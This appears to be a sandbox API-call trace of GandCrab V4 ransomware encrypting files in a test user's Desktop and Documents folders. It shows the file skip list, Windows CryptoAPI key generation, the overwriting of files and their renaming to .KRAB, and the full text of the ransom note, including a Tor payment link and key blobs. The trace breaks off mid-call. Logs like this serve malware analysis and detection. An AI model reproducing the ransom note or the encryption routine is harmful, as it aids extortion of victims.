[0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="ntuser.dat.log") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="thumbs.db") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="KRAB-DECRYPT.html") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="ntldr") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="NTDETECT.COM") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="Bootfont.bin") returned 1 [0088.341] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.342] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0088.344] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.344] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.344] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.344] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.344] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.344] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.345] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0088.346] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.347] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.347] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.347] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.347] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0088.347] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.348] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011700) returned 1 [0088.349] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023338) returned 1 [0088.349] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.349] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.350] GetLastError () returned 0x0 [0088.350] CryptDestroyKey (hKey=0x1023338) returned 1 [0088.350] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0088.350] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0088.351] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023038) returned 1 [0088.351] CryptGetKeyParam (in: hKey=0x1023038, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.352] CryptEncrypt (in: hKey=0x1023038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.352] GetLastError () returned 0x0 [0088.352] CryptDestroyKey (hKey=0x1023038) returned 1 [0088.352] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.352] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YjcuW46gUxYRn7.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\yjcuw46guxyrn7.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.352] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.353] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.353] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x1398c, lpOverlapped=0x0) returned 1 [0088.370] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffec674, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.370] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1398c, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x1398c, lpOverlapped=0x0) returned 1 [0088.370] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.370] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.376] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.378] CloseHandle (hObject=0x434) returned 1 [0088.379] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.379] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YjcuW46gUxYRn7.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\yjcuw46guxyrn7.ppt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YjcuW46gUxYRn7.ppt.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\yjcuw46guxyrn7.ppt.krab")) returned 1 [0088.380] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.380] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.380] lstrcmpW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2=".") returned 1 [0088.380] lstrcmpW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="..") returned 1 [0088.380] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="z09XhHTUIZ7XQ5oJ.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\z09XhHTUIZ7XQ5oJ.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\z09XhHTUIZ7XQ5oJ.pptx" [0088.380] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.380] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\z09XhHTUIZ7XQ5oJ.pptx.KRAB") returned 56 [0088.381] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\z09XhHTUIZ7XQ5oJ.pptx") returned 51 [0088.381] lstrlenW (lpString=".pptx") returned 5 [0088.381] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.381] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pptx ") returned 6 [0088.381] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.381] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\z09XhHTUIZ7XQ5oJ.pptx") returned 51 [0088.381] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\z09XhHTUIZ7XQ5oJ.pptx") returned 51 [0088.381] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="desktop.ini") returned 1 [0088.381] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="autorun.inf") returned 1 [0088.381] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="ntuser.dat") returned 1 [0088.382] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="iconcache.db") returned 1 [0088.382] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="bootsect.bak") returned 1 [0088.382] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="boot.ini") returned 1 [0088.382] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="ntuser.dat.log") returned 1 [0088.382] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="thumbs.db") returned 1 [0088.385] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="KRAB-DECRYPT.html") returned 1 [0088.385] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.385] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.385] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="ntldr") returned 1 [0088.385] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="NTDETECT.COM") returned 1 [0088.385] lstrcmpiW (lpString1="z09XhHTUIZ7XQ5oJ.pptx", lpString2="Bootfont.bin") returned 1 [0088.385] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.385] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0088.387] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.387] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.388] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.388] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.388] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0088.388] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.388] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010bd8) returned 1 [0088.390] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.390] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.391] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.391] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.391] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0088.391] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.391] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0088.392] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0088.393] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.393] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.393] GetLastError () returned 0x0 [0088.393] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0088.393] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0088.393] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010f08) returned 1 [0088.395] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023238) returned 1 [0088.395] CryptGetKeyParam (in: hKey=0x1023238, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.395] CryptEncrypt (in: hKey=0x1023238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.395] GetLastError () returned 0x0 [0088.395] CryptDestroyKey (hKey=0x1023238) returned 1 [0088.395] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0088.395] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\z09XhHTUIZ7XQ5oJ.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\z09xhhtuiz7xq5oj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.396] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.396] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.397] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xa40e, lpOverlapped=0x0) returned 1 [0088.433] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff5bf2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.433] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa40e, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xa40e, lpOverlapped=0x0) returned 1 [0088.433] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.433] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.439] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.439] CloseHandle (hObject=0x434) returned 1 [0088.439] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.440] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\z09XhHTUIZ7XQ5oJ.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\z09xhhtuiz7xq5oj.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\z09XhHTUIZ7XQ5oJ.pptx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\z09xhhtuiz7xq5oj.pptx.krab")) returned 1 [0088.441] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.441] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0088.441] FindClose (in: hFindFile=0x1023cb8 | out: hFindFile=0x1023cb8) returned 1 [0088.441] CloseHandle (hObject=0x320) returned 1 [0088.442] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0088.442] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0088.442] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0088.442] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Documents" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents" [0088.442] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\" [0088.442] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0088.442] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0088.442] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0088.442] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0088.442] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0088.442] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.443] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.443] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\\\KRAB-DECRYPT.txt") returned 49 [0088.443] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0088.444] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0088.444] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0088.444] CloseHandle (hObject=0x320) returned 1 [0088.445] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.445] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.445] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x23, wMilliseconds=0x283)) [0088.445] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.446] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0088.446] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0088.446] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a08d2ca4dee3d.lock") returned 55 [0088.446] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0088.447] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.447] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.447] lstrlenW 